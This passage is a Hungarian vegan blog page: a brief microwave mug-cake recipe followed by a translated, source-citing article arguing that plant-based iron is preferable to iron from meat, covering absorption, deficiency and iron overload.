Szeretnél egy finom reggelit, de nincs időd sütögetni? Semmi baj! Itt a megoldás; nem kell hozzá más, csak néhány hozzávaló, egy mikró, és 5 perc. Hozzávalók - 100gr túró - 1 tojásfehérje - 30gr édesítőszer - 10gr kakaópor - 25gr barnarizs liszt - 25gr kókuszliszt - 1tk sütőpor - 60ml kávé - 100ml kókusztej - 50gr sajtkrém - 25gr vaníliás fehérjepor Így készítsd - Keverd össze egy bögrébe a hozzávalókat a sajtkrém, kókusztej, és fehérjepor kivételével - Utóbbiakat keverd össze külön - Csinálj egy lyukat a bögre közekébe, és töltsd meg a krémmel, majd fedd le egy kis kakaós keverékkel - Tedd mikróba 5 percre
Vasaljuk ki a tényeket, avagy “Miért a növényi vas a legjobb?”
2018. február 25. Vegán lettem
Vashiány okozta betegségek, fakó bőr és vérszegénység. Ez vár a vegánokra. Vagy mégsem? 2017-ben egy 59 forrásra hivatkozó tanulmányban cáfolták ezen hiedelmeket. Az eredeti tanulmány szerzője és angol címe: Dr Justin Butler – Ironing out the facts (Why plant iron is the best) LINK az eredeti tanulmányhoz. Fordította: Kertész Tibor A fordítást lektorálta és a stilisztikai helyreigazítását végezte: Garai Attila (Biológus, az Orvosi továbbképző szemle szerkesztője) Az egyik legelterjedtebb táplálkozási mítosz, hogy a vegetáriánusok és a vegánok esetében nagyobb a vashiányos vérszegénység kockázata, mivel nem fogyasztanak húst. Ez egyszerűen nem így van, és ebben számos nagy egészségügyi szervezet, mint a Brit Orvosok Szövetsége (BMA), az Egészségügyi Világszervezet (WHO) és az Amerikai Dietetikusok Szövetsége (ADA) is egyetért. Azonban egyes ,,egészségügyi szervezetek, egészségügyi szakértők és táplálkozási szakírók továbbra is úgy népszerűsítik a vörös húst, mint a legjobb vasforrást. Egyikük sem említi azonban a húsban található vas egészségügyi kockázatait a növényi vassal szemben. Ez a cikk leleplezi ezt a nyugati társadalmakban élő mítoszt, amely a húst remek vasforrásként reklámozza, és elmagyarázza, miért jobb a növényi vas. Mi a vas, és miért van rá szükségünk? A vas a vörösvérsejtekben található festékanyag, a hemoglobin alapvető eleme. Segíti az oxigén szállítását a test minden részébe, elengedhetetlen az élethez. Ha a vasbevitel alacsony, a vörösvérsejtekben lévő hemoglobin mennyisége csökkenhet, ami vashiányos vérszegénységhez vezethet. A tünetek közé tartozik a fáradékonyság, a gyengeség, a szédülés, a hidegérzet és a figyelemösszpontosítás zavara. Mennyi vasra van szükségünk? Az Egyesült Királyságban a javasolt tápanyagbevitel (RNI) a felnőtt férfiak számára napi 8,7 mg, míg nők számára 50 éves korig napi 14,8 mg (Egészségügyi Minisztérium, 1991). A nőknek nagyobb a vasigényük, mert a menstruációval vasat is vesztenek. A fiatalabb és idősebb csoportokra vonatkozó RNI az alábbi táblázatban található: Ajánlott napi bevitel az Egyesült Királyságban Életkor mg vas 0-3 hónap 1,7 4-6 hónap 4,3 7-12 hónapos 7,8 1-3 év 6,9 4-6 év 6,1 7-10 év 8,7 Férfi, 11-18 év 11,3 Férfi, 19 év felett 8,7 Nő, 11-50 év 14,8 Terhes nő 27,0 Posztmenopauzális nő (50+ év) 8,7 Forrás: Egészségügyi Minisztérium, 1991. Étrend-kiegészítők A vaspótló készítmények túladagolása székrekedéshez, hányingerhez, hányáshoz, gyomorfájáshoz vezethet, nagyon nagy dózis, különösen a gyermekeknél, akár végzetes is lehet (FSA, 2003). Továbbá nem minden vaspótló azonos. Például a két vegyértékű vasat tartalmazó vas(II)-szulfát (amelyet számos háziorvos felír) hányingert és székrekedést okozhat, valamint akadályozhatja az E-vitamin felszívódását. Az egyéb formák jobban tolerálhatók, például a vas-pikolinát, a vas-citrát és a vas-biszglicinát. A vas kiegészítők növényi formái, mint a Floradix és a Flavoravital, amelyeket bio- és gyógynövényboltokban árulnak, kíméletesek a szervezethez. A VVF (Vegetarian & Vegan Foundation, a cikk írója a szervezet tagja) azt javasolja, hogy forduljon táplálkozási szakértőhöz, mielőtt táplálékkiegészítőt alkalmazna. A legtöbb ember hozzájut az összes szükséges vashoz változatos és kiegyensúlyozott étrend fogyasztásával. A vas fajtái Az élelmiszerekben kétféle vas van: Hem vas az állati szövetekben található. Ez a vas a hemoglobin (oxigént szállító fehérje a vérben) és a mioglobin (oxigént szállító molekula az izomban) része. A hem vas a vörös húsokban, baromfihúsban és halakban található vas körülbelül felét teszi ki. Nem hem vas alkotja a vastartalom másik felét az állati szövetekben és a teljes vastartalmat a növényi élelmiszerekben, a tejtermékekben (amelyek nagyon kis mennyiséget tartalmaznak) és a tojásban. Az átlagos brit étrendben található vas körülbelül 90 százaléka nem hem vas, a többi 10 százalék főleg a hús hemoglobinjából származó hem vas (Bull és Buss, 1980). Az Egyesült Királyság Élelmiszer Szabványügyi Hivatala (FSA) a 2003-as Országos Élelmiszer- és Táplálkozási Felmérésben vizsgálta a vasforrásokat, és megállapította, hogy az összes (hem és nem hem) vas 17 százaléka húsból, 3 százaléka halból, és 1 százaléka tejtermékekből származik. A táplálékban lévő vas túlnyomó többsége (több mint 75 százalék) növényi alapú élelmiszerekből származik. A gabonafélék (például a teljes kiőrlésű tészta, a barna rizs és a teljes kiőrlésű kenyér) teszik ki a legnagyobb hányadot 44 százalékkal (FSA, 2003a). Ez jól mutatja, hogy a legjelentősebb vasforrásaink a növényi élelmiszerek, a húsfogyasztók és a vegetáriánusok/vegánok számára egyaránt. A növényi táplálékok vastartalma A következő táblázat azt mutatja, hogy a növényi élelmiszerek bővelkednek vasban. A hüvelyesek (borsó, bab és lencse) és a szójatermékek (mint például a szójatej és a tofu) kiváló vasforrások. Ugyanígy a sötétzöld leveles zöldségek (mint a brokkoli, a kínai kel és a vízitorma), a dúsított reggeli gabonapelyhek, a teljes kiőrlésű gabonafélék (mint a teljes kiőrlésű kenyér, a barna rizs és a teljes kiőrlésű tészta), az aszalt gyümölcsök (pl. mazsola, szilva, kajszibarack és füge), a fekete melasz és a fekete csokoládé. Egyes növényi élelmiszerek vastartalma (átlagos adag) mg vas napi RNI százaléka Férfiak (8,7 mg) Nők (14,8 mg) Sült bab (135g) 1,9 22 13 Korpa pehely (40g) 9,7 111 66 Tofu (100g) 3,5 40 24 Vesebab (90 g) 1,8 16 12 Vörös lencse (120 g) 2,9 33 20 Spagetti (220g) 3,1 36 21 Barna rizs (180g) 0,9 10 6 Fodros káposzta (95g) 1,9 22 13 Brokkoli (85g) 0,9 10 6 Szezámmag (12g) 1,3 15 9 Tökmag (12g) 1,8 21 12 Aszalt szilva (hat darab, szárított, 48g) 1,2 14 8 Füge (három darab, szárított, 60g) 2,5 29 17 Forrás: FSA (Food Standards Agency) 2002. (További magas vastartalmú növényekről találsz infót a “Vitaminok és nyomelemek a növényekben” című cikkben.) A vas felszívódása Mind a hem, mind a nem hem vas a vékonybélben szívódik fel, de különböző mechanizmusok segítségével. Úgy gondolják, hogy a hem vas a bél nyálkahártyáján (bélfalon) át jut a véráramba, ahol a vas lehasad róla, és egy központi vasraktárba jut a nem hem vassal együtt (Geissler és Powers, 2005). Ez a folyamat független attól, hogy mennyi vas van a szervezetben (vasstátusz) és hogy milyen összetevők vannak még a táplálékban. Ezért szívódik fel könnyebben a hem vas, mint a nem hem vas. Becslések szerint 15-35%-os a hem vas és 2-20%-os a nem hem vas felszívódása (Monsen, 1988). A nem hem vas felszívódása a belekben nagyon változó, olyan tényezőktől is függ, mint a vas státusz és más élelmiszerek jelenléte az étkezésben. Számos táplálkozási tényező befolyásolja a nem hem vas abszorpcióját. A nagy arányú felszívódás nem feltétlenül jó dolog, mivel nincs olyan mechanizmus, ami a felesleges vasat eltávolítaná a szervezetből. Más szavakkal, a növényekből származó vas előnyösebb a szervezet számára, mert a felszívódása biztonságosan szabályozott. Ezzel szemben az állati eredetű vas felhalmozódhat olyan mennyiségben, ami káros lehet (lásd a továbbiakban). A vas felszívódását csökkentő tényezők Fitát A fitát (inozitol-hexafoszfát) hántolatlan gabonaszemekben, magvakban és hüvelyesekben található (amelyek szintén gazdag vasforrások); A korpa különösen gazdag forrás. A fitát erősen megköti a vasat és más ásványi anyagokat (beleértve a kalciumot, a magnéziumot és a cinket), és hiányt okozhat, ha ezeknek az ásványi anyagoknak a bevitele nem kielégítő. Például a harmadik világban azért gyakori a vashiány a gyerekek körében, mert alacsony a vasfelszívódás a rizsből, kukoricából, búzából, zabból vagy cirokból készült kásákból, gabonapelyhekből (Hurrell és mtsai, 2003). Számos lehetőség van a fitát hatásainak leküzdésére. Segíthet, ha a vasban gazdag élelmiszereket magas C-vitamin-tartalmú ételekkel együtt fogyasztjuk (lásd lent). A főzés is növelheti a rendelkezésre álló vas mennyiségét (Viadel és mtsai., 2006; Bishnoi és mtsai 1994). Egy tanulmány kimutatta, hogy 48 különböző zöldség közül 37 szolgáltatott több vasat főzés után (Yang és mtsai, 2002). A rendelkezésre álló vas mennyisége a főtt brokkoliban ötszörösére, a főtt káposztában háromszorosára növekedett. A kenyér fermentálási (kovászolási) időtartamának növelése szintén csökkenti a fitáttartalmat (Nävert és mtsai., 1985). A gabonák, a magvak és a hüvelyesek csíráztatása szintén hatékony módszer, mivel a fitát a csírázásnál felszabadul. A vizsgálatok azt mutatják, hogy a csíráztatás és a hántolás akár 92 százalékkal csökkentette a fitáttartalmat a rizsben és a mungóbabban (Marero és mtsai, 1991) és 20-62 százalékos mértékben növelte a vasabszorpciót a különböző gabonákból és hüvelyesekből (Hemalatha és mtsai., 2007). Ne feledjük azonban, hogy a teljes kiőrlésű kenyér és a barna rizs két-háromszor annyi vasat tartalmaz, mint a fehér kenyér vagy a fehér rizs (Craig és mtsai 1994). Tehát ha a teljes kiőrlésű gabonákból kisebb arányú is a felszívódás, a szervezetbe jutó vas mennyisége így is közel azonos. Magasabb vitamin-, ásványianyag- és rosttartalmuk miatt ezek az élelmiszerek jobb hatással vannak egészségünkre. Polifenolok és a tannin A polifenolok a növényekben található kémiai anyagok egy csoportja. Antioxidáns tulajdonságokkal rendelkeznek, ami olyan jelentős egészségügyi előnyökkel jár, mint a szív- és érrendszeri betegségek (CVD) és a rák kockázatának csökkentése. A tanninok (avagy csersavak) a polifenolok egyik csoportja, például a teában és a vörösborban találhatóak meg. A nem hem vassal komplexeket képeznek, amelyek csökkenthetik a vasfelszívódást (Brune és mtsai., 1989). A tanninok ilyen hatása aggaszthatja azokat, akik rendszeresen fogyasztanak bort az étkezésekhez, viszont a borban lévő alkohol fokozhatja a vas felszívódást (a gyomorsav-kiválasztás stimulálásával), és egyes kutatók megállapították, hogy a vörösborban lévő fenolok hatása aligha befolyásolja jelentősen a szervezet vasegyensúlyát (Cook és mtsai., 1995). Egymásnak ellentmondó információink vannak arról, hogyan hat a teázás a vasstátuszra. A kutatási eredmények azt mutatják, hogy a teafogyasztás nem befolyásolja a vasstátuszt egészséges, kiegyensúlyozottan táplálkozó és elegendő raktározott vassal rendelkező embereknél (Temme és Hoydonck, 2002; Nelson és Poulter, 2004). Ha aggódik a vasszintje miatt és teát fogyaszt az étkezésekhez (vagy csak a reggelihez), fogyasszon inkább frissen facsart narancslevet (a C-vitamin-tartalom fokozza a vas felszívódását), és a teázással várjon legalább egy órát az étkezés után. Kalcium Egyes tanulmányok azt mutatják, hogy a tehéntej fogyasztása étkezés közben csökkentheti a vas felszívódását. Ez a gátló hatás valószínűleg összefügg a tejben lévő tejfehérjével, a kazeinnel (Hurrell és mtsai., 1989) és a kalciummal (Hallberg és mtsai., 1991). A fitáttal és a tanninnal ellentétben a kalcium egyaránt csökkenti a nem hem és a hem vas felszívódását (Fairweather-Tait, 2004), és ez a gátló hatás nem semlegesíthető sem C-vitaminnal, sem más savakkal. A szakértők szerint a kalcium azáltal akadályozza a vas felszívódását, hogy csökkenti a fitát bontását. Az egyik kísérletben mindössze 40 mg kalciumot adtak 80 g liszthez, és ez 50 százalékkal csökkentette a fitátbontást (Hallberg és mtsai., 1991). A kalciumnak emellett közvetlen vasfelszívódást gátló hatása is van. Ugyanebben a kísérletben 165 mg kalcium (például tej, sajt vagy kalcium-klorid formájában) 50-60 százalékkal csökkentette a vasfelszívódást. A kutatók arra a következtetésre jutottak, hogy a napi étkezéseinkben előforduló kalciummennyiség komoly hatással van a táplálkozásunkra. Ez nem jelenti azt, hogy korlátozni kell a kalciumbevitelt; a kalcium nagyon fontos ásványi anyag. Azonban a vasfelszívódásra gyakorolt kedvezőtlen hatása miatt ne igyon tehéntejet és ne fogyasszon kalcium tartalmú étrend-kiegészítőket étkezéskor. Oxálsav Az oxálsav megtalálható számos növényben, például a spenótban, a mángoldban és cékla levelében. Teában, csokoládéban és egyéb kakaós termékekben is előfordul. Képes a kalciummal és a magnéziummal oldhatatlan sókat alkotni, amelyek csökkentik e fontos ásványi anyagok felszívódását. Egyes adatok arra mutatnak, hogy az oxálsav közvetlenül is akadályozhatja a vas felszívódását. Azonban a legújabb kutatási eredmények azt mutatják, hogy a gyümölcsökben és zöldségekben lévő oxálsav csekély hatással van a vasháztartásra (Bonsmann és mtsai., 2008). A vas felszívódását elősegítő tényezők C-vitamin A gyümölcsökben és zöldségekben bőségesen megtalálható C-vitamin (aszkorbinsav) jelentősen növelheti a vasfelszívódást (Hunt és mtsai., 1990; Sharma és Mathur, 1995). Ezt a következő két mechanizmus által éri el: a vasat oldható, könnyebben felszívódó formába konvertálja, illetve kötést képez vele, így megakadályozza, hogy a vas a fitátokkal vagy tanninnal komplexeket alkosson (Fairweather-Tait, 2004). Már nyolc szem földieper vagy 200 ml narancslé C-vitamin-tartalma (75 mg) három-négyszeresére növelheti a vas felszívódását (Craig, 1994). Ha növelni szeretné a vasfelszívódás mértékét, helyettesítse a reggeli csésze teát vagy kávét egy pohár frissen facsart narancslével. Ha aggódik az alacsony vasszintje miatt, akkor próbálja együtt fogyasztani a magas C-vitamin-tartalmú és a vasban gazdag ételeket. Ebben segítenek alábbi javaslataink. Hús Kimutatták, hogy kis mennyiségű hús (körülbelül 50 gramm) növeli a nem hem vas felszívódását olyan ételekben, amelyek nagy koncentrációban tartalmaznak fitátot, viszont C-vitaminban szegények (Baech és mtsai., 2003). Több kutatócsoport megpróbálta meghatározni a megfoghatatlan ,,hústényezőt. A potenciális jelöltek közé tartoznak bizonyos, húsban található aminosavak (a fehérjék építőkövei), amelyek átalakíthatják a nem hem vasat könnyebben felszívódó formába. Illetve lehet a hatás kiváltója az izomszövet egyik komponense, az L-alfa-glicero-foszfokolin (Armah és mtsai, 2008). Azonban a C-vitamin a nem hem vas felszívódását erősebben segíti elő, mint a hús (Baech és mtsai., 2003), és ha a C-vitamin-bevitel megfelelő, akkor a húsnak csak csekély hatása lehet. (Az állatok ételként, valamint tárgy és tulajdonstátuszában kezelését teljes mértékben elutasítja a blog a tulajdonosa, a cikk fordítója és lektora egyaránt. Az állatok nem tárgyak, nem alapanyagok, vagy alapanyag termelő gépek, ugyanakkor a tisztánlátás, a tárgyilagosság fontossága, és a hitelesség végett, a “hús” mint megszokott alapanyag kifejezés használatát az eredeti formájában hagytuk meg. – szerk.) A vasstátusz mérése Az emberi test vasstátuszának értékelésére számos különböző módszer létezik. A két leggyakoribb módszer a hemoglobin és a szérumferritin mérése. A ferritin egy fehérje, amely három vegyértékű (ferri) vas formájában vasat tárol a szervezetben. A vérben lévő ferritin mennyisége tükrözi, hogy mennyi vasat tárol a szervezet későbbi felhasználásra. Lehetséges, hogy önnek normális a hemoglobinszintje, de közben alacsony a ferritinszintje. A ferritinszint hosszú távú vashiány miatt lehet alacsony, vagy ha a szervezet alultápláltság miatt fehérjehiányos állapotban van. Értelemszerűen a ferritinszint akkor magas, ha hosszú távon több vasat fogyasztunk a szükségesnél. Ha úgy gondolja, hogy túl kevés (vagy túl sok) a vas a vérében, vérvizsgálatot kérhet. A nyugati társadalmakban az alacsony vasszintet és a vashiányos vérszegénységet hosszan tartó vagy súlyos vérzés (például menstruáció), várandósság vagy a hirtelen növekedés okozza, nem az elégtelen táplálkozás. Túl magas vasszintet genetikai állapot, jelentős mennyiségű vérátömlesztés vagy a vaspótló készítmények túladagolása okozhat. Állapot jelző Normál szint (egy liter vérben) Szérumferritin 30-300 mikrogramm Hemoglobin 120-180 gramm Forrás: Sharp, P. 2005. Vashiány A vashiány a legelterjedtebb táplálkozási probléma a világon (Sharp, 2005). Valójában a világ népességének egynegyede vashiányos lehet, és körülbelül 500 millió ember szenved vashiányos vérszegénységben (Cook és mtsai., 1994). A tünetek közé tartozik a fáradékonyság, sápadtság és a legyengült immunrendszer. A vashiányos vérszegénységben szenvedő gyermekeknél a csökkent figyelem-összpontosító képesség iskolai problémákhoz is vezethet (Grantham-McGregor és Ani, 2001). Az FSA kijelenti, hogy vashiány szempontjából a következő csoportok a legveszélyeztetettebbek: hat hónapos kor feletti csecsemők, kisgyermekek, serdülők és terhes nők, mert nekik az átlagosnál több vasra van szükségük (FSA, 2003). Az elégtelen felszívódás okozhat gondot az idős embereknél és azoknál, akik vasfelszívódást gátló ételeket fogyasztanak. A menstruáló nők és akik kórosan sok vért veszítettek, szintén veszélyeztetettek. Egy, az Egyesült Királyságban végzett vizsgálat a menstruációs vérveszteséget és az étrendet vizsgálva arra a következtetésre jutott, hogy bár az étrend is fontos tényező, a menstruáció van a legjelentősebb hatással a vasstátuszra (Harvey és mtsai., 2005). Az FSA nem tartja a vegetáriánusokat és a vegánokat veszélyeztetett csoportnak. Növényi étrendek és a vas A különböző vegetáriánus étrendeket vashiányos táplálkozásként jellemezték, bár számos tanulmány kimutatta, hogy valójában a rosszul megtervezett étrend okozza a problémát (Leitzmann, 2005). A jól kiegyensúlyozott vegetáriánus vagy vegán étrend rengeteg vasat biztosít. A nyugati társadalmakban a vegetáriánus vagy vegán étrend ugyanannyi vagy még több vasat tartalmazhat, mint a húst tartalmazó vegyes étrend (Harvey és mtsai., 2005; Hunt, 2003). A vegetáriánusok és a vegánok még a nagy rosttartalmú (és ezáltal sok fitátot tartalmazó) táplálékkal is hasonló mennyiségű vasat vittek be, mint a húsevők (Craig, 1994). Egy friss tanulmány összehasonlította 33 000 húsevő, 10 000 halfogyasztó, 18 000 vegetáriánus és 2500 vegán vizsgálati személy vasbevitelét, és megállapította, hogy a vegánok bevitele a legnagyobb. Őket a halfogyasztók és a vegetáriánusok követték, a húsevők bevitele volt a legalacsonyabb érték (Davey, és mtsai., 2003). A vegetáriánusok szervezete hajlamosabb kevesebb vasat raktározni (szérumferritin), mint a húsevőké. Ennek okai a következők lehetnek: a hem vas könnyebben felszívódik, mint a nem hem vas; a hús fokozza a nem hem vas felszívódását; illetve a vegetáriánus étrend nagyobb mértékben tartalmazhat olyan vasfelszívódást gátló összetevőket, mint a fitát, a csersav és a kalcium (Harvey és mtsai., 2005). Ennek ellenére a vegetáriánusok között nem gyakoribb a vashiányos vérszegénység előfordulása. A Brit Orvostársaság és az Amerikai Dietetikus Társaság (British Medical Association és az American Dietetic Association) egyetért abban, hogy a vegetáriánusoknak nincs nagyobb esélyük a vashiányra, mint a húsevőknek (BMA, 1986, American Dietetic Association, 2003). Bár a vegetáriánusok szervezete kevesebb vasat raktároz, ennek kedvezőtlen egészségügyi hatását nem mutatták ki a változatos vegetáriánus étrendek egyikéről sem a fejlett országokban. Valójában a mérsékelten kevesebb vas raktározása csökkenti bizonyos krónikus betegségek kockázatát (Hunt, 2003). Ismert tény, hogy sok húsfogyasztónál vastöbblet keletkezik, ami növeli a szív- és érrendszeri megbetegedések (CVD) és bizonyos rákos megbetegedések kockázatát (Leitzmann, 2005). Túl sok a jóból? A túl sok vas a szervezetben mérgező. Ennek ellenére széles körben elterjedt az a meggyőződés, hogy minél több vas van az étrendben, annál jobb. Egyes táplálkozási és dietetikai tankönyvekbe ezt még mindig beleírják. Számos tanulmány azt mutatja, hogy a jelentős vastöbblettel rendelkező betegek esetében nagyobb a szív- és érrendszeri betegségek (CVD), bizonyos daganatos betegségek és más egészségügyi problémák előfordulásának aránya. Vastöbbletet egy örökletes állapot is okozhat (veleszületett hemokromatózis), ami 250 emberből egyet érint (észak-európai származásúaknál) (Burke és mtsai., 2000). Általában a máj csak annyi vasat tárol, amennyi az új vörösvérsejtek létrehozásához szükséges. Ha a szervezetbe túl sok vas szívódik fel (ami ebben a betegségben előfordulhat), akkor ez felhalmozódik a májban, illetve más szövetekben és szervekben is lerakódik. A vastúltengés olyan kellemetlen tüneteket okozhat, mint a hányinger, hasi fájdalom, székrekedés és ízületi fájdalom. Májkárosodáshoz, szívelégtelenséghez és cukorbetegséghez is vezethet (NHS Direct, 2008). A férfiakra veszélyesebb a veleszületett hemokromatózis, mert nem veszítenek rendszeresen vért (és egyben vasat), mint a nők a menstruáció során. Ez a körülmény is azt mutatja, hogy bizony a jóból is megárthat a sok. Vasban gazdag receptek A következő ételek segítenek fokozni a vasbevitelt a vasban gazdag és a vasfelszívódást elősegítő táplálékok kombinálásával. Reggeli - Sült bab és/vagy tofu-,,rántotta teljes kiőrlésű pirítóssal - Zabkása szója-, rizs- vagy zabtejjel, aszalt gyümölcsökkel (például füge vagy aszalt szilva) és lenmaggal a tetején - Frissen facsart narancs- vagy grépfrútlé a fentiekkel Ebéd - Vízitorma saláta datolyával, pirított tökmaggal és narancsszeletekkel - Babsaláta (konzerv vegyes bab, zeller, olívaolaj, fokhagyma, citromlé, petrezselyem és kakukkfű), zöld salátával, koktélparadicsommal és teljes kiőrlésű zsemlével - Teljes kiőrlésű pita humusszal, vöröshagymával és pirospaprika szeletekkel töltve - Gyümölcslé és/vagy gyümölcs Vacsora - Pirított zöldségek (brokkoli, zöldpaprika, pak-choi (bordáskel), cukorborsó) szezámmag, napraforgómag, tökmag és kesudió, quinoa ágyon felszolgálva - Teljes kiőrlésű spagetti bolognai szójamártással (vesebab, cukkini, hagyma, paradicsom, paprika és gomba, bazsalikommal és oregánóval elkészítve) - Spenót és csicseriborsó curry, lencse dhal (fűszeres indiai egytálétel) és teljes kiőrlésű csapáti (indiai lepénykenyér) - Gyümölcslé és/vagy gyümölcs A vas és a szívbetegség A gyanú, hogy a túl sok vas növelheti a szívbetegség kockázatát, először a Lancet-ben jelent meg 1981-ben (Sullivan, 1981). Sullivan felvetette, hogy a menstruációs vérveszteség lehet a felelős a változókor előtt álló nőknél észlelt alacsonyabb szívbetegség-kockázatért az azonos korú férfiakhoz képest. Azóta más tanulmányok is megerősítették, hogy a vastöbblet növeli a CVD kockázatát (Salonen és mtsai., 1992). Ahogy a nőknél a menstruáció, az önkéntes véradás is jelentős vérveszteséget okoz, ami befolyásolhatja a raktározott vas mennyiségét. 1997-ben három különböző vizsgálat is kimutatta, hogy a rendszeres véradás csökkentette a szívbetegség és a stroke kockázatát (Tuomainen és mtsai., 1997; Meyers és mtsai., 1997; Kiechl és mtsai., 1997). A véradás során elveszített vas lehet a kockázatcsökkenés oka. Egy újabb tanulmány azt mutatta, hogy a gyakori véradás és az ezzel járó alacsonyabb vasszint javította az érrendszeri funkciókat és csökkentette az oxidatív stresszt a donoroknál (Zheng és mtsai., 2005). Az elmélet szerint a vas elősegíti a szabad gyököknek nevezett káros molekulák termelődését, amelyek oxidálhatják (károsíthatják) az artériák belső felületét, így növelve a CVD kockázatát. Ezek az eredmények még jobban alátámasztják a magas vasszint és a CVD összefüggését. |Más tanulmányok azonban arra a következtetésre jutottak, hogy nincs kapcsolat a vasstátusz és a CVD között. A British Medical Journal-nek írt levelükben finn kutatók kifogásolták ezt a következtetést, és bebizonyították, hogy minden ilyen tanulmányban megbízhatatlan módon mérték a vasstátuszt (a szérum vaskoncentrációját, illetve a transzferintelítettséget), vagy egyéb tervezési hibát követtek el (Hemilä és Paunio, 1997). Az összefüggést kételyek nélkül elfogadó néhány kutató javasolta: csökkenteni kell a raktározott vas mennyiségét, hogy csökkentsük a CVD kockázatát. Egyes kutatók szerint elegendő bizonyítékunk van ahhoz, hogy a vas mesterséges pótlása helyett inkább a véradás fontosságát hangsúlyozzuk. Mások azonban óvatosságra intenek, mert az emberiség jelentős részét érintő hiánybetegség esetében különösen stabil tudományos alapok kellenek a jelenlegi stratégia megváltoztatásához (Sempos, 2002). Nyilvánvaló, hogy több kutatásra van szükség. Az a legésszerűbb, ha kiegyensúlyozott vegetáriánus vagy vegán étrenden élünk, amely sok, magas vastartalmú növényt tartalmaz. A vas és a cukorbetegség A hemokromatózisban szenvedő betegek akár 65%-ánál is diabétesz alakulhat ki (Adams és mtsai., 1991). Mivel ezeknek a betegeknek a szöveteiben felhalmozódik a vas, ebből arra lehetett következtetni, hogy a vastúltengés cukorbetegséget okozhat. A vasbevitel és a cukorbetegség vizsgálata során kiderült, hogy míg a szervezet összes vasbevitele nincs összefüggésben a cukorbetegséggel, addig a vörös húsból származó hem vas esetében fennáll az összefüggés (Jiang és mtsai., 2004). A hem vas szabályozatlanul szívódik fel, és idővel felgyülemlik a testben. Mint már említettük, a vas katalizálhatja a szabad gyökök képződését. Ezek a káros molekulák a cukorbetegség (Oberley, 1988; Wolff, 1993) és más betegségek kialakulásában is szerepet játszanak. Új kutatások a terhes nők magas vasszintje és a terhességi cukorbetegség közötti összefüggést is jelezték. A vizsgálat szerzői arra a következtetésre jutottak, hogy a vaspótló tablettákból származó vastöbblet szerepe a terhességi cukorbetegség kialakulásában további vizsgálatokat kíván (Afkhami-Ardekani és Rashidi, 2008). Összefoglalva, a kutatás azt mutatja, hogy az inzulinrezisztencia és a diabétesz közvetlenül kapcsolódik a vastúltengéshez. A jó hír az, hogy a vegetáriánusok és a vegánok esetében ritkább az inzulinrezisztencia és a cukorbetegség, mint a húsevőknél (Kuo és mtsai., 2004). Meg kell jegyezni, hogy a vegánok étrendje nem hem vasat tartalmaz, amely szabályozottabb módon szívódik fel, mint a hem vas. Egy 30 vegetáriánust és 30 húsevőt összehasonlító tanulmány kimutatta, hogy a vegetáriánusoknak megfelelő, de alacsonyabb a vasszintjük, mint a húsevőknek. Kevesebb vegetáriánus szenved inzulinrezisztenciában (Hua és mtsai., 2001). Összefoglalva, a vegetáriánusok és a vegánok szervezete hajlamos kevesebb vasat tárolni, mint a húsevőké, mégsem gyakoribb közöttük a vashiányos vérszegénység. Ezzel szemben jól tudjuk, hogy sok húsevő vas többlettel rendelkezik, ami növeli a CVD és a rák kockázatát (Leitzmann, 2005). Baby blues Az élet első hat hónapjában a csecsemőknek csak az anyatejre (vagy speciálisan összeállított tejpótlóra) van szükségük, amely megfelelő mennyiségben tartalmaz vasat. Hat hónapos kor után a csecsemők táplálkozási szükségleteit önmagában az anyatej már nem elégíti ki. Például a 4-6 hónapos korban 4,3 mg-os napi vasigény 6 hónapos kor felett 7,8 mg-ra emelkedik. A csecsemők vérszegénységének elsődleges oka a nem megfelelő (túl korai vagy túl késői) elválasztási időpont, illetve a kiegyensúlyozatlan étrend. A helyzetet tovább rontja, hogy a tehéntej-allergia emésztőrendszeri vérzéshez vezethet, és a rektális (végbéli) vérzésnek is jól ismert okozója (Willetts és mtsai., 1999). A tejallergia okozta emésztőszervi vérzés gyakran olyan kis mennyiségű, hogy a vérveszteség nem észlelhető, de idővel vashiányos vérszegénységet okozhat. 52 csecsemő vizsgálata (akik közül 31-et szoptattak és 21-et tápszerrel tápláltak) megállapította, hogy a tehéntej bevezetése az étrendbe bélrendszeri vérveszteséggel és táplálkozási szempontból jelentős vasveszteséggel járt (Ziegler és mtsai, 1990). Frank Oski, a Johns Hopkins Orvosegyetem gyermekgyógyászati tanszékének korábbi vezetője úgy gondolja, hogy az Egyesült Államokban a tehéntej-allergia által okozott emésztőrendszeri vérzés felelős a vashiányos esetek feléért a csecsemők között (Oski, 1996). Ez megdöbbentően nagy szám, mivel a 2 éven aluliak több mint 15 százaléka szenved vashiányos vérszegénységben az Egyesült Államokban. Összefoglalás: - A vas a vörösvérsejtek hemoglobinjának létfontosságú eleme, amely segít az oxigént a test minden részébe eljuttatni. - Az Egyesült Királyságban az ajánlott vasbevitel felnőtt férfiaknak napi 8,7 mg, a nőknek 50 éves korig napi 14,8 mg. - A kiegyensúlyozott és változatos étrend a legtöbb ember számára biztosítja a szükséges mennyiségű vasat. - A túl sok vas székrekedést, hányingert, hányást és gyomorfájást okozhat, nagyon magas dózis halálos is lehet, különösen gyermekeknél. - A vas(II)-szulfát tartalmú vaspótló tabletta székrekedést és hányingert okozhat. - A táplálékban kétféle vas van: a húsból származó hem vas és a növényekből származó nem hem vas. - Az étkezéssel bevitt vas legnagyobb része (több mint 75 százalék) növényi táplálékból származik. - Jó vasforrások a hüvelyesek (borsók, babok és lencsék), a szójából készült termékek (szójatej és tofu), a sötétzöld leveles zöldségek (petrezselyem, brokkoli, pak-choy (bordáskel) és vízitorma), a dúsított gabonareggelik, a teljes kiőrlésű gabona (teljes kiőrlésű kenyér és tésztafélék), az aszalt gyümölcsök (mazsola, aszalt szilva, aszalt kajszibarack), a fekete melasz és az egyszerű fekete csokoládé. - A hem vas felszívódása független a szervezet vasszintjétől és a táplálék többi összetevőjétől. - A nem hem vas felszívódása számos tényező függvénye, beleértve a vasstátuszt és az étrend többi összetevőjét is. - Az állati eredetű és az étrend-kiegészítőkből származó vas ártalmas mennyiségben is felhalmozódhat. - A hántolatlan gabonákból, illetve a magokból és hüvelyesekből származó fitátok megkötik a vasat és akadályozzák a felszívódását. A fitáttartalom fermentálással, főzéssel és csíráztatással csökkenthető. - A teában lévő tanninok csökkenthetik a vas felszívódását. Kerülje a tea fogyasztást étkezés közben. - A tehéntej (kazein és kalcium) csökkentheti a vas felszívódását. Kerülje a tehéntej fogyasztását és a kalcium tartalmú étrend-kiegészítőket étkezés közben. - A spenótban, mángoldban, céklában jelenlévő oxálsavnak kis jelentősége van a vas felszívódásában. - A szójafehérje akadályozhatja a vasfelszívódást, bár ez a hatás csökkenthető a fitáttartalom csökkentésével. - A gyümölcsökben és zöldségekben lévő C-vitamin 